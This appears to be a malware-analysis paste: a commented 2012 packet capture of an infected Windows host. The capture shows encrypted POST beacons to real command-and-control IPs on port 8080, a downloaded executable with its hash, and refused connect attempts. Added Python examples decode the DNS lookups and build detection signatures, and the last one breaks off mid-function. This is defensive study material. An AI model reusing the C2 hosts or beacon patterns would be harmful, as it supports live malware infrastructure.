- -----------details-internet traffic-------------------
- //Try to reach 208.87.243.18
- 192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // an HTTP POST to 74.207.237.170:8080
- 192.168.7.84 74.207.237.170:8080 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 74.207.237.170:8080
- Content-Length: 347
- Connection: Keep-Alive
- Cache-Control: no-cache
- ......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
- DP.....O@xt,U..V|............c1..4~:
- R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
- .....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
- W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
- .......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
- u..2.~@
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 01 83 00 3f 40 00 80 06 f8 bf c0 a8 07 54 4a cf ...?@... .....TJ.
- 0020 ed aa 04 11 1f 90 5a 54 91 b8 89 da 8f 5b 50 18 ......ZT .....[P.
- 0030 42 30 27 30 00 00 2e d7 f7 a7 03 ea 64 55 cf d6 B0'0.... ....dU..
- 0040 5a 50 e9 81 b2 b6 59 09 79 79 e6 b8 7c 34 24 52 ZP....Y. yy..|4$R
- 0050 a3 22 06 a4 11 86 ac 75 e0 08 b3 2b 54 12 a4 31 .".....u ...+T..1
- : : : :
- 0130 70 18 57 c8 97 30 ac 6d 93 08 fb a2 41 3f aa 75 p.W..0.m ....A?.u
- 0140 c7 83 e7 af 3d 7c 3c ef 5c 05 27 83 1e 2e d1 9b ....=|<. \.'.....
- 0150 88 df 35 1f 5f 37 27 f1 f9 34 36 0e b0 47 5c b7 ..5._7'. .46..G\.
- 0160 6f 22 20 16 cb e9 9c 7d 01 98 08 45 9f a5 4b bf o" ....} ...E..K.
- 0170 d5 90 32 65 45 e4 e9 2c b0 55 1d 3d ca 43 e2 e8 ..2eE.., .U.=.C..
- 0180 d8 d5 4b 74 55 e1 f6 9e 8d 75 a1 92 32 1c 7e 40 ..KtU... .u..2.~@
- 0190 7c |
- // The reply is long encrypted binary data...
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 09:58:07 GMT
- Content-Type: text/html; charset=UTF-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- f3b
- .}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
- 2U...`......p_| ]X.$...B..A.F....}.snip
- .@C...4*j..|.\..%..xv-.....snip
- .1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
- z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
- [.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
- v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
- n..Z...fG..t...1.|...`Vsnip
- ...#^&5.[...K...!i}...}.44...@...Zp`.."....*...snip
- %.(.....T .C.Md.#-.{q........G.&5+.N.,.R.....V>snip
- .g.{1...d..+t....T.g$....#..bMQ.f.5x.....pM'"a.snip
- :
- :snip
- :
- .%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
- 3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
- .<p....N....,..v......R...d..U_...?....k...-.....E%.snip
- ...a.AZ$......H...7r......
- 0
- // Some more communication: try to connect to 132.248.49.112
- 192.168.7.84 132.248.49.112 TCP afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // At this point the data received above was saved in the %Temp% folder:
- FileName: exp2.tmp.exe
- timeStamp: 2012/12/15 18:58 122,880
- MD5 ce7474646297ed818bb8ed48f50c7e1e
- // DNS requests to...
- 112.49.248.132.in-addr.arpa web.ecologia.unam.mx
- 77.65.130.113.in-addr.arpa ns.shinbiro.com..domain
- 00000000 35 ea 01 00 00 01 00 00 00 00 00 00 03 31 31 32 5....... .....112
- 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
- 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 ddr.arpa .....
- 00000000 35 ea 81 80 00 01 00 01 00 00 00 00 03 31 31 32 5....... .....112
- 00000010 02 34 39 03 32 34 38 03 31 33 32 07 69 6e 2d 61 .49.248. 132.in-a
- 00000020 64 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 ddr.arpa ........
- 00000030 0c 00 01 00 00 1c 1f 00 16 03 77 65 62 08 65 63 ........ ..web.ec
- 00000040 6f 6c 6f 67 69 61 04 75 6e 61 6d 02 6d 78 00 ologia.u nam.mx.
- 0000002D cb 61 01 00 00 01 00 00 00 00 00 00 02 37 37 02 .a...... .....77.
- 0000003D 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
- 0000004D 64 72 04 61 72 70 61 00 00 0c 00 01 dr.arpa. ....
- 0000004F cb 61 81 83 00 01 00 00 00 01 00 00 02 37 37 02 .a...... .....77.
- 0000005F 36 35 03 31 33 30 03 31 31 33 07 69 6e 2d 61 64 65.130.1 13.in-ad
- 0000006F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0f 00 06 dr.arpa. ........
- 0000007F 00 01 00 00 07 07 00 2e 02 6e 73 08 73 68 69 6e ........ .ns.shin
- 0000008F 62 69 72 6f 03 63 6f 6d 00 06 64 6f 6d 61 69 6e biro.com ..domain
- 0000009F c0 3b 77 bf 64 79 00 00 2a 30 00 00 0e d8 00 12 .;w.dy.. *0......
- 000000AF 75 00 00 01 51 80 u...Q.
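The two hex dumps above are the raw PTR query/response pairs for 132.248.49.112 and 113.130.65.77 (both hosts the sample later tries to reach on http-alt). The parser below is an added example, not part of the original paste: it transcribes the four messages byte for byte from the dumps and decodes them, compression pointers included, so the summary lines can be read off the wire data. It shows that the first lookup answers web.ecologia.unam.mx with TTL 7199, and that the second is an NXDOMAIN whose authority section carries the zone's SOA (MNAME ns.shinbiro.com, RNAME domain.shinbiro.com), which is where the "ns.shinbiro.com..domain" on the summary line comes from. Function names are mine; the byte strings are from the page.

```python
"""Decode the PTR query/response pairs shown in the hex dumps above."""
import struct

# Message bytes transcribed from the dumps on this page (the dump offsets are
# per-direction stream offsets, so each message is written out separately).
REV_1 = "03313132023439033234380331333207696e2d61646472046172706100"   # 112.49.248.132.in-addr.arpa
REV_2 = "0237370236350331333003313133" "07696e2d61646472046172706100"  # 77.65.130.113.in-addr.arpa
PTR_QUERY_1 = bytes.fromhex("35ea01000001000000000000" + REV_1 + "000c0001")
PTR_RESPONSE_1 = bytes.fromhex(
    "35ea81800001000100000000" + REV_1 + "000c0001"   # flags 0x8180, QD=1, AN=1
    + "c00c" "000c" "0001" "00001c1f" "0016"           # name ptr, PTR, IN, TTL 7199, RDLEN 22
    + "037765620865636f6c6f67696104756e616d026d7800"   # web.ecologia.unam.mx
)
PTR_QUERY_2 = bytes.fromhex("cb6101000001000000000000" + REV_2 + "000c0001")
PTR_RESPONSE_2 = bytes.fromhex(
    "cb6181830001000000010000" + REV_2 + "000c0001"   # flags 0x8183: RCODE 3, NS=1
    + "c00f" "0006" "0001" "00000707" "002e"           # zone name ptr, SOA, IN, TTL 1799, RDLEN 46
    + "026e73087368696e6269726f03636f6d00"             # MNAME ns.shinbiro.com
    + "06646f6d61696ec03b"                             # RNAME "domain" + ptr -> shinbiro.com
    + "77bf6479" "00002a30" "00000ed8" "00127500" "00015180"  # serial/refresh/retry/expire/min
)

DNS_TYPE = {1: "A", 2: "NS", 6: "SOA", 12: "PTR"}
RCODE = {0: "NOERROR", 3: "NXDOMAIN"}


def read_name(msg: bytes, off: int):
    """Decode a possibly compressed name at msg[off]; return (name, next_offset)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # RFC 1035 4.1.4 pointer
            if end is None:
                end = off + 2                           # reading resumes after the pointer
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 32:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def parse_message(msg: bytes) -> dict:
    """Parse header, question, answer and authority sections (additional is ignored)."""
    ident, flags, qd, an, ns, _ar = struct.unpack("!6H", msg[:12])
    out = {"id": ident, "response": bool(flags & 0x8000),
           "rcode": RCODE.get(flags & 0xF, str(flags & 0xF)),
           "questions": [], "answers": [], "authority": []}
    off = 12
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        out["questions"].append((name, DNS_TYPE.get(qtype, qtype)))
    for section, count in (("answers", an), ("authority", ns)):
        for _ in range(count):
            name, off = read_name(msg, off)
            rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            if rtype == 12:                              # PTR: a single name
                value, _ = read_name(msg, off)
            elif rtype == 6:                             # SOA: two names + five 32-bit fields
                mname, p = read_name(msg, off)
                rname, p = read_name(msg, p)
                serial, refresh, retry, expire, minimum = struct.unpack("!5I", msg[p:p + 20])
                value = {"mname": mname, "rname": rname, "serial": serial, "refresh": refresh,
                         "retry": retry, "expire": expire, "minimum": minimum}
            else:
                value = msg[off:off + rdlen].hex()
            off += rdlen
            out[section].append((name, DNS_TYPE.get(rtype, rtype), ttl, value))
    return out


def ptr_to_ip(name: str) -> str:
    """Turn a reverse name back into the dotted IP it asks about."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        raise ValueError("not an in-addr.arpa name")
    return ".".join(reversed(name[:-len(suffix)].split(".")))


if __name__ == "__main__":
    for msg in (PTR_QUERY_1, PTR_RESPONSE_1, PTR_QUERY_2, PTR_RESPONSE_2):
        print(parse_message(msg))
```

Running it prints the four decoded messages; the IDs 0x35ea and 0xcb61 pair each response with its query, and ptr_to_ip() on the question names gives back the same addresses the host tries to connect to before and after the lookups.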
- //Another POST command detected to 203.113.98.131:80
- POST /asp/intro.php HTTP/1.0
- Host: 203.113.98.131
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 257
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......w
- .....}..5.+..6.SD4.>
- t......K...M........\..G...7V/..5].....|.....#.....=.P*^k.....b3cm.8..6..O...T....$|.......yb.~#...k0.|........o...[JD.HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:01:37 GMT
- Content-Type: text/html; charset=windows-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 16
- STATUS-IMPORT-OK
- // At this point the malware process exp2.tmp.exe was started....
- ---------------take 2---------------------
- // send ACK packet (try to connect) to 74.207.237.170
- 192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // send ping to 209.190.61.50
- 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
- 209.190.61.50 192.168.7.84 ICMP Time-to-live exceeded (Time to live exceeded in transit)
- // Communicating via HTTP/POST with 174.143.174.136:8080
- //post....
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 174.143.174.136:8080
- Content-Length: 408
- Connection: Keep-Alive
- Cache-Control: no-cache
- .m......(...P..0.w.j."...V....s.x.....c.....FH..?.. .I.t..`....OA&../.?$..._J..
- .....b...ws.'I..l..r........}....+`91.R..+..P.....7q..+Q...........-\g'G.6..l...rV..[.4S..K.5'!?...=.......S...2AkUh..S....b4..#....!.$.
- .+d;K..].>&....._g.w...i)..}.,.....f..YD.G.KI....9......rZ
- .~q.+......Sk.i...........t....!.m*......;..w."...[.'
- ..i...:..$..w.....X1gR+..U}b..U..../....(...K.FIAVR..4.....,...ujk...i....H..eHTTP/1.1 200 OK
- // reply:
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:13:52 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......\z#W.2.Pp_..NU..
- // post...
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 174.143.174.136:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ........b,.B..k'..`.9...r...7)@.~..^..E..o....y..YP .o...*gp......y..w........QF..^...J.......oV)vs..0eh....H....h7.K%Q,.c..I.U~S...\..?....g...Re,...\.?<.]2~.kw..M..t._.?.z.M<...h.-..Q.W.......Dg.3.1.."{Tf..RKw..9".T.......-."
- ..f(X..8..._...3*~+.%..Y.FH...\..:../.!.1G.I9..........o).........6*dXm.|-....$.6.. ..........8.....TJ...U....4TX.IdJ|b.=.e....h.G.....A...>.pC6.......]t..C'..HTTP/1.1 200 OK
- //reply....
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:13:52 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`........X.'8...".~K..J.
- // Try to establish connection with 199.71.215.194
- 192.168.7.84 199.71.215.194 TCP cognex-insight > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 199.71.215.194 192.168.7.84 TCP http-alt > cognex-insight [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // Communication via HTTP/POST with 210.56.23.100:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 210.56.23.100:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ./Pl$,........*|.`..9...R{...B.....A...#.H..K.=e.......(.np...nn..y...M a.........2S...S..{|?....A.k..........
- ..Q#.g..~........S...\..?....g...Re,....s.I..]..,......@I.R..P.n....I;te.<&......-9.!......8j...R.......Y....*.D&..={pY.3.l".;......xn..g.N.....T..,>..rOJ!..D=.>.J..
- .(q..... ..P&....m.u6.....?....#.).W.........z....(.FF
- V.R
- ...-v!..38s)ab|....bKU..$..S..</.
- )4..1+...>.O.....HTTP/1.1 200 OK
- Server: nginx/1.0.11
- Date: Sat, 15 Dec 2012 10:05:22 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.........c.M..A..9.....
- //try connect again with 132.248.49.112
- 192.168.7.84 132.248.49.112 TCP rdrmshc > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 132.248.49.112 192.168.7.84 TCP http-alt > rdrmshc [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to connect w/ 74.117.61.66
- 192.168.7.84 74.117.61.66 TCP socks > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 74.117.61.66 192.168.7.84 TCP http-alt > socks [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- //Try to communicate w/ 173.192.229.36
- 173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- 192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- // Communication via HTTP/POST with 69.64.89.82:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 69.64.89.82:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ..[.
- 8.|.
- . ...+...n.^.7.Mh=..R......Y....I.r$.O.....j..g..7l.4p#&....H.G5..P-.........ld}.l[......xd&..?
- ....)...>))'D;vgQ.....S...\..?....g...Re,.O..j.~y....+..?.S......a..5.....L.%.3v.........
- .......g.Xf...f..0.i`f..].E~\Z..4.G.....Nn.b..~......Dw.N...S.iW.......oI...W....t.!Hp.#8h..uAK...4L......j....f...]./
- .e...3k.o.b......T....[lm^8.X......l...."+9...2.v.\...GN..-....?.A".5wkRHTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 02:51:22 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......O..z.zj....>..;..
- // try to establish conn to: 173.224.221.135
- 192.168.7.84 173.224.221.135 TCP ltp-deepspace > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 173.224.221.135 192.168.7.84 TCP http-alt > ltp-deepspace [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to establish conn to: 59.90.221.6
- 192.168.7.84 59.90.221.6 TCP ardus-trns > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 59.90.221.6 192.168.7.84 TCP http-alt > ardus-trns [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // try to establish conn to: 180.235.150.72
- 192.168.7.84 180.235.150.72 TCP sacred > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 180.235.150.72 192.168.7.84 TCP http-alt > sacred [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // Communicating via HTTP/POST with 123.49.61.59:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- .K.Vn%d...;.Q6K.vq..)...T...e.,....c.q.K..............-.....t:.Hy(.....K.....t.d.......L,..7...}%..h&...?..)..*.@....Hg...ys.$A.S...\..?....g...Re,....H1ij..b.KC.....DJ....y.C2.I.0....#.4
- ...H...hi....~.T%5.M*v..z`..v....r..b....K.yQ...Se..5....Z2.r.+...H9..8.^A..>....".....]..&....\...`"/r...:e.mO..w.4..7...Q..!...Ll..(..I.M>x.\.Y>...ET...=.S.'.....(..(
- ...4Q.F.LN.......AI.&.*.w.u4..HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:29:45 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.........X)myU.>.^....JPOST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- ...:..'....F..oP.Ka.2U.d....N~9..|.....,..
- ...
- 8....!'......Cr..,.8
- ..F[....z.%_...p.L..........C':.rq.t...U..H..7.b.........I.IS...\..?....g...Re,..C...V..:...D.....W.3..jO...Sh`j.4.,....A.#..zcm.G.....D.6..4/.........s4\>..G.dh...........-........).%j...-mG..#W.......&d.....g.Y..(.w.Vs&.rj...uAV....>^1.J.J..4.....M...Rp..%..n.k.....wt....x........}.z`..d.:.$
- ..9..:...;I\....G/.G....HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:29:47 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`.......^...R.L&F..x....POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 123.49.61.59:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- g..7...:R...g\.....F......@..8B..w...}.28..^....})u...ZR.exi.f......h..T..s..j..4..'m.E....SZ?.R@f.
- .l...(>..U.~N=;..Z......&...S...\..?....g...Re,.,.".+..y.&U..X.f...G7J.$ s
- ..7#?..3..b.UC.]....`.-.,.......v....C......F9'.&...Q.L..A..6+..N.Vx.......+.R..o.l...%.Q.qSR.W..IBpoy...Y. n..7b
- ..jW.qO.*.j.'..f)I_7.
- R...5.0AY7....m..X...>..\M.QN.p.r.P.&f......Y.0.'..!e..j.s.-w>.HwL..j.0..[.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 10:30:01 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......,.&.3.."cz@..[.a.
- //Try to establish conn to: 113.130.65.77
- 192.168.7.84 113.130.65.77 TCP hpvmmcontrol > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 113.130.65.77 192.168.7.84 TCP http-alt > hpvmmcontrol [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- //Try to establish conn to: 180.235.150.72
- 802 795.966247 192.168.7.84 180.235.150.72 TCP saphostctrls > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 803 796.070637 180.235.150.72 192.168.7.84 TCP http-alt > saphostctrls [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- // Communicating via HTTP/POST with 69.64.89.82:8080
- POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
- Host: 69.64.89.82:8080
- Content-Length: 387
- Connection: Keep-Alive
- Cache-Control: no-cache
- .X...j.K.!L.C..............3.8.|...........w..9...W
- .K.Q....se.....k....y.;..6=$..%%.O....k'....iu|......=.?u..]%....?../...\...S...\..?....g...Re,.]...n.G.j..0O.X.rQ
- l...[.h.........-.zR..J\...".Q
- w..Yv..}:n..R.....6z.S0......_+.sXx....3n!.w..]k.o...d;^......b...8.h8.g.a...C.|C...m...4.M..[
- .T..3!k..T.U=1N.~d.c..C.m....
- ..}..&..y_5..u
- ..Z...Z4;.u@..|A..&..G|}._.\.L.....A....u..|`..'.
- HTTP/1.1 200 OK
- Server: nginx/1.0.10
- Date: Sat, 15 Dec 2012 02:55:11 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- Content-Length: 165
- ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
- .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
- .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
- 2U...`......]...v.T.v..%s.\.$
- -----------------------------internet data ends--------------------
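Read as a whole, the capture shows two things a defender can turn into detection logic: a fixed POST path on port 8080 with the same MSIE 7 User-Agent, Cache-Control: no-cache and a binary body that carries no Content-Type, answered by nginx with a fixed-size body; and a second, separate POST style (application/octet-stream, Content-Encoding: binary, an MSIE 5.0/Windows 98 User-Agent, body opening with the literal CRYPTED0) answered with STATUS-IMPORT-OK. Around them sit SYNs to http-alt that are answered with RST/ACK, i.e. dead or unreachable peers. The script below is an added example, not part of the paste: it runs over lines copied from the capture plus one constructed benign request and produces an IoC-style summary. Signature names, the path regex and the benign request are my own choices.

```python
"""Triage the captured lines above: tag the two POST signatures and list peers
that refused the connect attempts (added example, not part of the paste)."""
import re
from typing import Dict, List, Tuple

# Packet-list lines copied from the capture (constructed input for this example).
PACKET_LINES = """\
192.168.7.84 208.87.243.18 TCP sbl > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
208.87.243.18 192.168.7.84 TCP http-alt > sbl [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 132.248.49.112 TCP afrog > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
132.248.49.112 192.168.7.84 TCP http-alt > afrog [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 74.207.237.170 TCP danf-ak2 > http-alt [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
173.192.229.36 192.168.7.84 TCP http-alt > mctp [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
192.168.7.84 173.192.229.36 TCP mctp > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
""".splitlines()

# Request headers copied from the capture; bodies are not reproduced, the
# CRYPTED0 prefix is the only body detail the capture shows in clear text.
BEACON_REQUEST = (
    "POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\r\n"
    "Host: 74.207.237.170:8080\r\nContent-Length: 347\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
CRYPTED_REQUEST = (
    "POST /asp/intro.php HTTP/1.0\r\nHost: 203.113.98.131\r\nAccept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\nContent-Length: 257\r\nConnection: close\r\n"
    "Content-Type: application/octet-stream\r\nContent-Encoding: binary\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n"
)
CRYPTED_BODY = b"CRYPTED0" + bytes(range(24))       # constructed filler after the prefix
BENIGN_REQUEST = (                                   # constructed control; must not fire
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0\r\n\r\n"
)

PACKET_RE = re.compile(r"^(\S+) (\S+) TCP (\S+) > (\S+) \[([^\]]+)\]")
BEACON_PATH_RE = re.compile(r"^/(?:[A-Za-z0-9]{6,12}/){3}$")   # three token-like segments
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"


def refused_peers(lines: List[str]) -> List[str]:
    """Peers that answered our SYN to http-alt with RST/ACK, in any line order."""
    syn, rst = set(), set()
    for line in lines:
        m = PACKET_RE.match(line)
        if not m:
            continue
        src, dst, sport, dport, flags = m.groups()
        if flags == "SYN" and dport == "http-alt":
            syn.add((dst, sport))               # (peer, our ephemeral port name)
        elif flags == "RST, ACK" and sport == "http-alt":
            rst.add((src, dport))               # same pair, seen from the peer's side
    return sorted(peer for peer, _ in syn & rst)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request head into (method, path, lower-cased headers)."""
    head = raw.partition("\r\n\r\n")[0].split("\r\n")
    method, path, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        key, _, value = line.partition(":")
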